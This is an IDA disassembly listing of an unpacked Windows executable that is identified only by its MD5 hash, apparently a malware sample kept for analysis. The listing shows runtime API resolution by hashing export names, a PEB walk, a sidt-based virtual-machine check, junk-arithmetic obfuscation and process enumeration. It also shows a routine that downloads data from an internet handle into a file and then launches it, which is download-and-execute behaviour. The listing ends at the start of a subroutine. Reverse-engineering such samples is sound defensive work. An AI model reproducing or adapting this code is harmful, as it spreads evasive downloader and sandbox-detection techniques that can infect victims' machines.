;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 8AD5A0EE21BEBD0D5A34B020FB04F687
; File Name : u:\work\8ad5a0ee21bebd0d5a34b020fb04f687_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40102E+28�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
lea ecx, [esi-1]
test ecx, ecx
push 2
pop eax
jz short loc_401015
loc_40100F: ; CODE XREF: sub_401000+13�j
imul eax, eax
dec ecx
jnz short loc_40100F
loc_401015: ; CODE XREF: sub_401000+D�j
movzx edx, [esp+4+arg_0]
push 8
pop ecx
sub ecx, esi
dec eax
shl eax, cl
and eax, edx
sar eax, cl
mov ecx, esi
shl edx, cl
pop esi
or eax, edx
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40102E proc near ; CODE XREF: sub_401115:loc_401159�p
; sub_401472+234�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_4]
push 100h
xor esi, esi
push esi
push edi
call sub_4010B9
add esp, 0Ch
cmp [esp+8+arg_8], esi
jle short loc_401069
push ebx
mov ebx, [esp+0Ch+arg_0]
loc_401050: ; CODE XREF: sub_40102E+38�j
movzx eax, byte ptr [ebx]
push 6
push eax
call sub_401000
inc ebx
mov [esi+edi], al
inc esi
cmp esi, [esp+14h+arg_8]
pop ecx
pop ecx
jl short loc_401050
pop ebx
loc_401069: ; CODE XREF: sub_40102E+1B�j
mov byte ptr [esi+edi], 0
pop edi
pop esi
retn
sub_40102E endp
; =============== S U B R O U T I N E =======================================
sub_401070 proc near ; CODE XREF: sub_401115:loc_4011BD�p
push esi
mov eax, fs:[eax+30h]
test eax, eax
js short loc_401085
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov eax, [eax+8]
jmp short loc_40108E
; ---------------------------------------------------------------------------
loc_401085: ; CODE XREF: sub_401070+7�j
mov eax, [eax+34h]
lea eax, [eax+7Ch]
mov eax, [eax+3Ch]
loc_40108E: ; CODE XREF: sub_401070+13�j
pop esi
retn
sub_401070 endp
; ---------------------------------------------------------------------------
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401092 proc near ; CODE XREF: sub_401C08+1F7�p
var_7 = byte ptr -7
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_1], 0
sidt fword ptr [ebp+var_7]
mov eax, dword ptr [ebp+var_7+2]
and eax, 0FFF00000h
cmp eax, 0FFC00000h
jnz short loc_4010B3
mov [ebp+var_1], 1
loc_4010B3: ; CODE XREF: sub_401092+1B�j
movzx eax, [ebp+var_1]
leave
retn
sub_401092 endp
; =============== S U B R O U T I N E =======================================
sub_4010B9 proc near ; CODE XREF: sub_40102E+F�p
; sub_401472+FF�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
test ecx, ecx
jz short loc_4010E7
mov al, [esp+arg_4]
push ebx
mov bl, al
mov bh, bl
mov edx, ecx
push edi
mov edi, [esp+8+arg_0]
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
pop ebx
loc_4010E7: ; CODE XREF: sub_4010B9+6�j
mov eax, [esp+arg_0]
retn
sub_4010B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010EC proc near ; CODE XREF: sub_402478+187�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
mov eax, [ebp+arg_4]
jz short loc_40110C
mov ecx, [ebp+arg_0]
sub ecx, eax
loc_4010FD: ; CODE XREF: sub_4010EC+1E�j
mov dl, [eax]
dec [ebp+arg_8]
mov [ecx+eax], dl
inc eax
cmp [ebp+arg_8], 0
jnz short loc_4010FD
loc_40110C: ; CODE XREF: sub_4010EC+A�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_4010EC endp
; =============== S U B R O U T I N E =======================================
sub_401111 proc near ; CODE XREF: sub_402478+C�p
mov eax, [esp+0]
retn
sub_401111 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401115 proc near ; CODE XREF: sub_401115+50�p
; sub_4012F6+49�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp dword_404104, 50h
jge short loc_401128
inc dword_404104
loc_401128: ; CODE XREF: sub_401115+B�j
mov eax, [ebp+arg_0]
dec eax
push esi
jz loc_4011BD
dec eax
jz short loc_4011AE
dec eax
jz short loc_40119F
dec eax
jz short loc_401190
dec eax
jz short loc_401181
dec eax
jz short loc_401172
dec eax
jz short loc_40114C
xor eax, eax
jmp loc_4012F3
; ---------------------------------------------------------------------------
loc_40114C: ; CODE XREF: sub_401115+2E�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_40305C
loc_401159: ; CODE XREF: sub_401115+6A�j
; sub_401115+79�j ...
call sub_40102E
push 0C8AC8026h
push 1
call sub_401115
add esp, 14h
push esi
call eax
jmp short loc_4011C2
; ---------------------------------------------------------------------------
loc_401172: ; CODE XREF: sub_401115+2B�j
push 0Ch
mov esi, offset dword_404108
push esi
push offset dword_40304C
jmp short loc_401159
; ---------------------------------------------------------------------------
loc_401181: ; CODE XREF: sub_401115+28�j
push 9
mov esi, offset dword_404108
push esi
push offset dword_403040
jmp short loc_401159
; ---------------------------------------------------------------------------
loc_401190: ; CODE XREF: sub_401115+25�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
jmp short loc_401159
; ---------------------------------------------------------------------------
loc_40119F: ; CODE XREF: sub_401115+22�j
push 0Ah
mov esi, offset dword_404108
push esi
push offset dword_403028
jmp short loc_401159
; ---------------------------------------------------------------------------
loc_4011AE: ; CODE XREF: sub_401115+1F�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_40301C
jmp short loc_401159
; ---------------------------------------------------------------------------
loc_4011BD: ; CODE XREF: sub_401115+18�j
call sub_401070
loc_4011C2: ; CODE XREF: sub_401115+5B�j
mov ecx, dword_404104
cmp ecx, 13h
mov [ebp+arg_0], eax
jl short loc_4011D7
inc ecx
mov dword_404104, ecx
loc_4011D7: ; CODE XREF: sub_401115+B9�j
cmp ecx, 0A7h
jle short loc_4011E8
push 23h
pop ecx
mov dword_404104, ecx
loc_4011E8: ; CODE XREF: sub_401115+C8�j
push ebx
mov ebx, [ebp+arg_0]
mov eax, [ebx+3Ch]
mov edx, [eax+ebx+78h]
lea eax, [ecx-50h]
add edx, ebx
cmp eax, 0A6h
ja short loc_401206
inc ecx
mov dword_404104, ecx
loc_401206: ; CODE XREF: sub_401115+E8�j
mov eax, [ebp+arg_4]
shr eax, 10h
test ax, ax
jnz short loc_40121D
movzx eax, word ptr [ebp+arg_4]
sub eax, [edx+10h]
jmp loc_4012C9
; ---------------------------------------------------------------------------
loc_40121D: ; CODE XREF: sub_401115+FA�j
cmp ecx, 4
jl short loc_401229
inc ecx
mov dword_404104, ecx
loc_401229: ; CODE XREF: sub_401115+10B�j
cmp ecx, 0B5h
jle short loc_40123A
push 1Bh
pop ecx
mov dword_404104, ecx
loc_40123A: ; CODE XREF: sub_401115+11A�j
mov esi, [edx+20h]
push edi
mov edi, [edx+24h]
lea eax, [ecx-34h]
add esi, ebx
add edi, ebx
cmp eax, 0A4h
ja short loc_401256
inc ecx
mov dword_404104, ecx
loc_401256: ; CODE XREF: sub_401115+138�j
and [ebp+var_4], 0
cmp dword ptr [edx+18h], 0
jbe short loc_40128D
loc_401260: ; CODE XREF: sub_401115+176�j
mov ecx, [esi]
xor eax, eax
add ecx, [ebp+arg_0]
jmp short loc_401272
; ---------------------------------------------------------------------------
loc_401269: ; CODE XREF: sub_401115+161�j
movsx ebx, bl
rol eax, 7
xor eax, ebx
inc ecx
loc_401272: ; CODE XREF: sub_401115+152�j
mov bl, [ecx]
test bl, bl
jnz short loc_401269
cmp eax, [ebp+arg_4]
jz short loc_4012C1
inc [ebp+var_4]
mov eax, [ebp+var_4]
add esi, 4
inc edi
inc edi
cmp eax, [edx+18h]
jb short loc_401260
loc_40128D: ; CODE XREF: sub_401115+149�j
mov eax, [ebp+arg_0]
loc_401290: ; CODE XREF: sub_401115+1AF�j
push 1Fh
pop ecx
push 1Ah
pop esi
pop edi
loc_401297: ; CODE XREF: sub_401115+198�j
cmp esi, 0E1h
ja short loc_4012A1
inc ecx
inc esi
loc_4012A1: ; CODE XREF: sub_401115+188�j
add ecx, 17h
add esi, 17h
cmp ecx, 9Dh
jl short loc_401297
mov esi, [ebp+var_4]
mov dword_404104, ecx
cmp esi, [edx+18h]
jnz short loc_4012C6
xor eax, eax
jmp short loc_4012F2
; ---------------------------------------------------------------------------
loc_4012C1: ; CODE XREF: sub_401115+166�j
movzx eax, word ptr [edi]
jmp short loc_401290
; ---------------------------------------------------------------------------
loc_4012C6: ; CODE XREF: sub_401115+1A6�j
mov ebx, [ebp+arg_0]
loc_4012C9: ; CODE XREF: sub_401115+103�j
cmp ecx, 7
mov edx, [edx+1Ch]
lea eax, [edx+eax*4]
mov eax, [eax+ebx]
jl short loc_4012DE
inc ecx
mov dword_404104, ecx
loc_4012DE: ; CODE XREF: sub_401115+1C0�j
cmp ecx, 0DBh
jle short loc_4012F0
mov dword_404104, 1Ch
loc_4012F0: ; CODE XREF: sub_401115+1CF�j
add eax, ebx
loc_4012F2: ; CODE XREF: sub_401115+1AA�j
pop ebx
loc_4012F3: ; CODE XREF: sub_401115+32�j
pop esi
leave
retn
sub_401115 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012F6 proc near ; CODE XREF: sub_401C08+204�p
; sub_40298E+15�p
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
mov eax, dword_404104
sub esp, 94h
push esi
add eax, 0FFFFFFBCh
mov esi, 9Ah
cmp eax, esi
ja short loc_401317
inc dword_404104
loc_401317: ; CODE XREF: sub_4012F6+19�j
cmp byte_404209, 0
jz short loc_401327
mov al, byte_404208
jmp short loc_40136C
; ---------------------------------------------------------------------------
loc_401327: ; CODE XREF: sub_4012F6+28�j
push 9C480E24h
push 1
mov byte_404209, 1
mov [ebp+var_94], 94h
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_94]
push ecx
call eax
cmp [ebp+var_84], 2
setz al
cmp dword_404104, esi
mov byte_404208, al
jge short loc_40136C
inc dword_404104
loc_40136C: ; CODE XREF: sub_4012F6+2F�j
; sub_4012F6+6E�j
pop esi
leave
retn
sub_4012F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40136F proc near ; CODE XREF: sub_401472+28A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_404104, 0DEh
jge short loc_401385
inc dword_404104
loc_401385: ; CODE XREF: sub_40136F+E�j
push ebx
push esi
xor esi, esi
inc esi
cmp [ebp+arg_0], 0
push edi
jz loc_401435
mov edi, 99A4299Dh
push edi
push esi
call sub_401115
pop ecx
pop ecx
push [ebp+arg_0]
push esi
push esi
call eax
mov ebx, eax
test ebx, ebx
jz short loc_4013E9
cmp dword_404104, 25h
jge short loc_4013BF
inc dword_404104
loc_4013BF: ; CODE XREF: sub_40136F+48�j
push 0FDC94385h
push esi
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push ebx
call eax
mov edi, [ebp+var_4]
push 9E6FA842h
push esi
call sub_401115
pop ecx
pop ecx
push edi
push ebx
call eax
jmp short loc_401438
; ---------------------------------------------------------------------------
loc_4013E9: ; CODE XREF: sub_40136F+3F�j
mov eax, dword_404104
add eax, 0FFFFFFE0h
cmp eax, 0CDh
ja short loc_4013FE
inc dword_404104
loc_4013FE: ; CODE XREF: sub_40136F+87�j
push edi
push esi
call sub_401115
pop ecx
pop ecx
push [ebp+arg_0]
push 0
push esi
call eax
push 9E6FA842h
push esi
mov ebx, eax
call sub_401115
pop ecx
pop ecx
push 0FFFFFFFFh
push ebx
call eax
push 723EB0D5h
push esi
call sub_401115
pop ecx
pop ecx
push ebx
call eax
jmp short loc_401438
; ---------------------------------------------------------------------------
loc_401435: ; CODE XREF: sub_40136F+20�j
mov ebx, [ebp+arg_0]
loc_401438: ; CODE XREF: sub_40136F+78�j
; sub_40136F+C4�j
cmp dword_404104, 2
jl short loc_401447
inc dword_404104
loc_401447: ; CODE XREF: sub_40136F+D0�j
cmp dword_404104, 0F2h
jle short loc_40145D
mov dword_404104, 1Eh
loc_40145D: ; CODE XREF: sub_40136F+E2�j
push 723EB0D5h
push esi
call sub_401115
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_40136F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401472 proc near ; CODE XREF: sub_401C08+20E�p
; sub_40298E+DF�p ...
var_1318 = dword ptr -1318h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_116 = byte ptr -116h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1318h
call sub_402D00
cmp dword_404104, 0Dh
jl short loc_40148E
inc dword_404104
loc_40148E: ; CODE XREF: sub_401472+14�j
cmp dword_404104, 0EEh
jle short loc_4014A4
mov dword_404104, 25h
loc_4014A4: ; CODE XREF: sub_401472+26�j
push ebx
push esi
push edi
push 774393E8h
push 1
call sub_401115
pop ecx
pop ecx
push 100h
lea ecx, [ebp+var_318]
push ecx
push 0
call eax
push 8AC4909Bh
push 5
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_C]
push ecx
push 1000h
lea ecx, [ebp+var_1318]
push ecx
call eax
test eax, eax
jz loc_40177E
push 3Ch
pop eax
push 37h
pop ecx
loc_4014F3: ; CODE XREF: sub_401472+94�j
cmp ecx, 0E0h
ja short loc_4014FD
inc eax
inc ecx
loc_4014FD: ; CODE XREF: sub_401472+87�j
add eax, 2Bh
add ecx, 2Bh
cmp eax, 6Eh
jl short loc_4014F3
and [ebp+var_4], 0
test [ebp+var_C], 0FFFFFFFCh
mov dword_404104, eax
jbe loc_401783
mov edi, offset dword_404108
loc_401523: ; CODE XREF: sub_401472+304�j
mov ebx, [ebp+var_4]
lea ebx, [ebp+ebx*4+var_1318]
mov esi, [ebx]
test esi, esi
jz loc_40176A
lea ecx, [eax-18h]
cmp ecx, 0D2h
ja short loc_401548
inc eax
mov dword_404104, eax
loc_401548: ; CODE XREF: sub_401472+CE�j
push 99A4299Dh
push 1
call sub_401115
pop ecx
pop ecx
push esi
xor esi, esi
push esi
push 410h
call eax
push 100h
mov [ebp+var_8], eax
lea eax, [ebp+var_118]
push esi
push eax
call sub_4010B9
add esp, 0Ch
cmp [ebp+var_8], esi
jz loc_401752
push 189F16C9h
push 5
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_14]
push ecx
push 4
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_8]
call eax
test eax, eax
jz loc_401752
cmp dword_404104, 0D6h
jge short loc_4015B9
inc dword_404104
loc_4015B9: ; CODE XREF: sub_401472+13F�j
mov esi, [ebp+var_10]
push 0E4FB2191h
push 5
call sub_401115
pop ecx
pop ecx
push 100h
lea ecx, [ebp+var_118]
push ecx
push esi
push [ebp+var_8]
call eax
mov esi, dword_403008
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
test eax, eax
jz loc_401752
cmp [ebp+var_117], 3Ah
jnz loc_401752
cmp [ebp+var_116], 5Ch
jnz loc_401752
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
mov esi, eax
jmp short loc_40161B
; ---------------------------------------------------------------------------
loc_40161A: ; CODE XREF: sub_401472+1B1�j
dec esi
loc_40161B: ; CODE XREF: sub_401472+1A6�j
cmp [ebp+esi+var_118], 5Ch
jnz short loc_40161A
push [ebp+arg_0]
call dword_403008 ; lstrlen
test eax, eax
jle short loc_40167C
push 2Ah
pop eax
push 0FFFFFFEDh
pop ecx
loc_401638: ; CODE XREF: sub_401472+1DB�j
cmp ecx, 94h
ja short loc_401642
inc eax
inc ecx
loc_401642: ; CODE XREF: sub_401472+1CC�j
add eax, 24h
add ecx, 24h
cmp eax, 0B1h
jl short loc_401638
push [ebp+arg_0]
mov dword_404104, eax
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jnz loc_401752
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_1318]
jmp loc_40179F
; ---------------------------------------------------------------------------
loc_40167C: ; CODE XREF: sub_401472+1BE�j
xor eax, eax
push 0FFFFFFD0h
inc eax
pop ecx
loc_401682: ; CODE XREF: sub_401472+225�j
cmp ecx, 0AEh
ja short loc_40168C
inc eax
inc ecx
loc_40168C: ; CODE XREF: sub_401472+216�j
add eax, 0Ah
add ecx, 0Ah
cmp eax, 0C7h
jl short loc_401682
push 0Bh
push edi
push offset dword_40306C
mov dword_404104, eax
call sub_40102E
push 8A94F707h
push 7
call sub_401115
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
test eax, eax
jnz loc_401752
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_118]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_401752
push edi
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_401752
push dword ptr [ebx]
call sub_40136F
pop ecx
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_218]
push eax
call dword_403000 ; lstrcpy
push 1
push edi
push offset dword_403068
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_218]
push eax
call dword_40300C ; lstrcat
push 20E4E9EDh
push 1
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_218]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
loc_401752: ; CODE XREF: sub_401472+10A�j
; sub_401472+12F�j ...
push 723EB0D5h
push 1
call sub_401115
pop ecx
pop ecx
push [ebp+var_8]
call eax
mov eax, dword_404104
loc_40176A: ; CODE XREF: sub_401472+BF�j
mov ecx, [ebp+var_C]
inc [ebp+var_4]
shr ecx, 2
cmp [ebp+var_4], ecx
jb loc_401523
jmp short loc_401783
; ---------------------------------------------------------------------------
loc_40177E: ; CODE XREF: sub_401472+75�j
mov eax, dword_404104
loc_401783: ; CODE XREF: sub_401472+A6�j
; sub_401472+30A�j
cmp eax, 13h
jl short loc_40178E
inc eax
mov dword_404104, eax
loc_40178E: ; CODE XREF: sub_401472+314�j
cmp eax, 0D3h
jle short loc_40179F
mov dword_404104, 25h
loc_40179F: ; CODE XREF: sub_401472+205�j
; sub_401472+321�j
pop edi
pop esi
pop ebx
leave
retn
sub_401472 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017A4 proc near ; CODE XREF: sub_401C08+2A8�p
; sub_401C08+31C�p ...
var_87C = byte ptr -87Ch
var_47C = byte ptr -47Ch
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 87Ch
push ebx
push 13h
pop eax
xor ebx, ebx
push 0FFFFFFDDh
mov [ebp+var_4], ebx
mov [ebp+var_14], ebx
mov [ebp+var_20], 7D0h
pop ecx
loc_4017C3: ; CODE XREF: sub_4017A4+32�j
cmp ecx, 0B0h
ja short loc_4017CD
inc eax
inc ecx
loc_4017CD: ; CODE XREF: sub_4017A4+25�j
add eax, 10h
add ecx, 10h
cmp eax, 6Ch
jl short loc_4017C3
push esi
push edi
mov esi, 400h
push esi
mov dword_404104, eax
lea eax, [ebp+var_87C]
push ebx
push eax
call sub_4010B9
push 534D481h
push 3
mov [ebp+var_18], esi
call sub_401115
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_87C]
push ecx
push ebx
call eax
push 5
mov edi, offset dword_404108
push edi
push offset dword_403078
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_87C]
push eax
call dword_40300C ; lstrcat
mov eax, dword_404104
add eax, 0FFFFFF9Eh
cmp eax, 7Fh
mov [ebp+var_1C], ebx
ja short loc_40184B
inc dword_404104
loc_40184B: ; CODE XREF: sub_4017A4+9F�j
push 4
pop edi
loc_40184E: ; CODE XREF: sub_4017A4+3D8�j
push 8593DD7h
push edi
call sub_401115
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_87C]
push ecx
call eax
push 0B87DBD66h
push edi
mov [ebp+var_C], eax
call sub_401115
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_0]
push [ebp+var_C]
call eax
mov [ebp+var_8], eax
mov eax, dword_404104
add eax, 0FFFFFF9Fh
cmp eax, 84h
ja short loc_40189C
inc dword_404104
loc_40189C: ; CODE XREF: sub_4017A4+F0�j
push 1AD09C78h
push edi
call sub_401115
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 2
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_401115
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 6
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_401115
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 5
push [ebp+var_C]
call eax
cmp dword_404104, 0A0h
jge short loc_4018F9
inc dword_404104
loc_4018F9: ; CODE XREF: sub_4017A4+14D�j
push 2F5CE027h
push edi
mov [ebp+var_14], ebx
mov [ebp+var_4], edi
call sub_401115
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_14]
push ecx
push 20000005h
push [ebp+var_8]
call eax
mov eax, [ebp+var_14]
lea ecx, [eax-401h]
cmp ecx, 48FDEh
ja loc_401A6A
push 59h
pop eax
push 4Eh
pop ecx
loc_40193A: ; CODE XREF: sub_4017A4+1A9�j
cmp ecx, 0D1h
ja short loc_401944
inc eax
inc ecx
loc_401944: ; CODE XREF: sub_4017A4+19C�j
add eax, 26h
add ecx, 26h
cmp eax, 66h
jl short loc_40193A
push 8F8F114h
push 1
mov dword_404104, eax
call sub_401115
pop ecx
pop ecx
push ebx
push 80h
push edi
push ebx
push 2
push 40000000h
push [ebp+arg_4]
call eax
push esi
mov [ebp+var_10], eax
lea eax, [ebp+var_47C]
push ebx
push eax
mov [ebp+var_4], ebx
call sub_4010B9
push 1A212962h
push edi
mov [ebp+var_18], esi
call sub_401115
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
push 49h
test eax, eax
pop eax
push 22h
setnz cl
pop edx
loc_4019B7: ; CODE XREF: sub_4017A4+226�j
cmp edx, 0A4h
ja short loc_4019C1
inc eax
inc edx
loc_4019C1: ; CODE XREF: sub_4017A4+219�j
add eax, 1Dh
add edx, 1Dh
cmp eax, 6Eh
jl short loc_4019B7
cmp [ebp+var_4], ebx
mov dword_404104, eax
jbe short loc_401A44
loc_4019D6: ; CODE XREF: sub_4017A4+299�j
cmp cl, bl
jz short loc_401A3F
mov eax, [ebp+var_4]
push 0F3FD1C3h
push 1
mov [ebp+var_24], eax
call sub_401115
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_28]
push ecx
push [ebp+var_24]
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_10]
call eax
push esi
lea eax, [ebp+var_47C]
push ebx
push eax
call sub_4010B9
push 1A212962h
push edi
mov [ebp+var_18], esi
mov [ebp+var_4], ebx
call sub_401115
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz cl
cmp [ebp+var_4], ebx
ja short loc_4019D6
loc_401A3F: ; CODE XREF: sub_4017A4+234�j
mov eax, dword_404104
loc_401A44: ; CODE XREF: sub_4017A4+230�j
lea ecx, [eax-28h]
cmp ecx, 0A3h
ja short loc_401A55
inc eax
mov dword_404104, eax
loc_401A55: ; CODE XREF: sub_4017A4+2A9�j
push 723EB0D5h
push 1
call sub_401115
pop ecx
pop ecx
push [ebp+var_10]
call eax
jmp short loc_401A7D
; ---------------------------------------------------------------------------
loc_401A6A: ; CODE XREF: sub_4017A4+18A�j
add eax, 0FFFFFFFEh
cmp eax, 3FEh
ja short loc_401A7D
mov [ebp+arg_8], bl
jmp short loc_401A7D
; ---------------------------------------------------------------------------
loc_401A79: ; CODE XREF: sub_4017A4+2FF�j
cmp al, bl
jz short loc_401AA5
loc_401A7D: ; CODE XREF: sub_4017A4+2C4�j
; sub_4017A4+2CE�j ...
push 1A212962h
push edi
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz al
cmp [ebp+var_4], ebx
ja short loc_401A79
loc_401AA5: ; CODE XREF: sub_4017A4+2D7�j
mov eax, dword_404104
add eax, 0FFFFFFB3h
cmp eax, 0A5h
ja short loc_401ABA
inc dword_404104
loc_401ABA: ; CODE XREF: sub_4017A4+30E�j
push 7314FB0Ch
push edi
call sub_401115
pop ecx
pop ecx
push [ebp+var_8]
call eax
push 7314FB0Ch
push edi
call sub_401115
pop ecx
pop ecx
push [ebp+var_C]
call eax
mov eax, dword_404104
add eax, 0FFFFFFBDh
cmp eax, 96h
ja short loc_401AF3
inc dword_404104
loc_401AF3: ; CODE XREF: sub_4017A4+347�j
push 8F8F114h
push 1
call sub_401115
pop ecx
pop ecx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call eax
push 0AEF7CBF1h
push 1
mov [ebp+var_10], eax
call sub_401115
pop ecx
pop ecx
push ebx
push [ebp+var_10]
call eax
push 723EB0D5h
push 1
mov [ebp+var_24], eax
call sub_401115
pop ecx
pop ecx
push [ebp+var_10]
call eax
inc [ebp+var_1C]
cmp dword_404104, 0Ch
jl short loc_401B55
inc dword_404104
loc_401B55: ; CODE XREF: sub_4017A4+3A9�j
cmp dword_404104, 0F5h
jle short loc_401B6B
mov dword_404104, 18h
loc_401B6B: ; CODE XREF: sub_4017A4+3BB�j
mov edx, [ebp+var_14]
cmp edx, [ebp+var_24]
jz short loc_401B82
cmp [ebp+var_1C], 5
jge short loc_401B82
cmp [ebp+arg_8], bl
jnz loc_40184E
loc_401B82: ; CODE XREF: sub_4017A4+3CD�j
; sub_4017A4+3D3�j
push 2Ch
pop eax
push 0Ah
pop ecx
pop edi
pop esi
loc_401B8A: ; CODE XREF: sub_4017A4+3FB�j
cmp ecx, 0ADh
ja short loc_401B94
inc eax
inc ecx
loc_401B94: ; CODE XREF: sub_4017A4+3EC�j
add eax, 17h
add ecx, 17h
cmp eax, 8Ch
jl short loc_401B8A
mov dword_404104, eax
lea eax, [edx-2]
cmp eax, 3FEh
ja short loc_401BB4
xor eax, eax
jmp short loc_401C05
; ---------------------------------------------------------------------------
loc_401BB4: ; CODE XREF: sub_4017A4+40A�j
cmp [ebp+arg_8], bl
jz short loc_401C02
add edx, 0FFFFFBFFh
cmp edx, 48FDEh
ja short loc_401C02
push 40h
lea eax, [ebp+var_78]
push ebx
push eax
mov [ebp+var_7C], 44h
call sub_4010B9
push 46318AC7h
push 1
call sub_401115
add esp, 14h
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_7C]
push ecx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_4]
push ebx
call eax
xor eax, eax
inc eax
jmp short loc_401C05
; ---------------------------------------------------------------------------
loc_401C02: ; CODE XREF: sub_4017A4+413�j
; sub_4017A4+421�j
or eax, 0FFFFFFFFh
loc_401C05: ; CODE XREF: sub_4017A4+40E�j
; sub_4017A4+45C�j
pop ebx
leave
retn
sub_4017A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
